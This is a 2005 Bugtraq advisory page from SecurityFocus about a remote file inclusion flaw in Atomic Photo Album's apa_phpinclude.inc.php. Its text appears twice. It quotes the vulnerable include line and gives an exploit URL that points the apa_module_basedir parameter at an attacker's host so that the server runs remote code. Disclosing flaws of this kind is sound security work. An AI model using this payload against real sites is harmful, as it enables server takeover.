Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include
Jul 23 2005 09:11PM
gr0up pclabs gmail com
Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :>
------------------------------------------------------------
Name: Atomic Photo Album (APA)
Version: all
Homepage: http://atomicpa.sourceforge.net/
Author: pc_labs / lwdz - RandomHero
Date: 20 July 2005
------------------------------------------------------------
------------------------------------------------------------
Vulnerable code in : apa_phpinclude.inc.php
require_once("apa_authadm.inc.php");
else
require_once("apa_auth.inc.php");
....else{
require_once("$apa_module_basedir/apa_config.inc.php");
...
}
?>
------------------------------------------------------------
Exploit:
http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[
h4x0r_b0x]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified.
------------------------------------------------------------
Contact:
Irc: irc.cl#pc_labs
Author: pc_labs
Location: Chile
Email: gr0up.pclabs (at) gmail (dot) com [email concealed]
Greetz: AgReSsOr http://www.tbc-labz.net
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
------------------------------------------------------------
Name: Atomic Photo Album (APA)
Version: all
Homepage: http://atomicpa.sourceforge.net/
Author: pc_labs / lwdz - RandomHero
Date: 20 July 2005
------------------------------------------------------------
------------------------------------------------------------
Vulnerable code in : apa_phpinclude.inc.php
require_once("apa_authadm.inc.php");
else
require_once("apa_auth.inc.php");
....else{
require_once("$apa_module_basedir/apa_config.inc.php");
...
}
?>
------------------------------------------------------------
Exploit:
http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[
h4x0r_b0x]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified.
------------------------------------------------------------
Contact:
Irc: irc.cl#pc_labs
Author: pc_labs
Location: Chile
Email: gr0up.pclabs (at) gmail (dot) com [email concealed]
Greetz: AgReSsOr http://www.tbc-labz.net
[ reply ]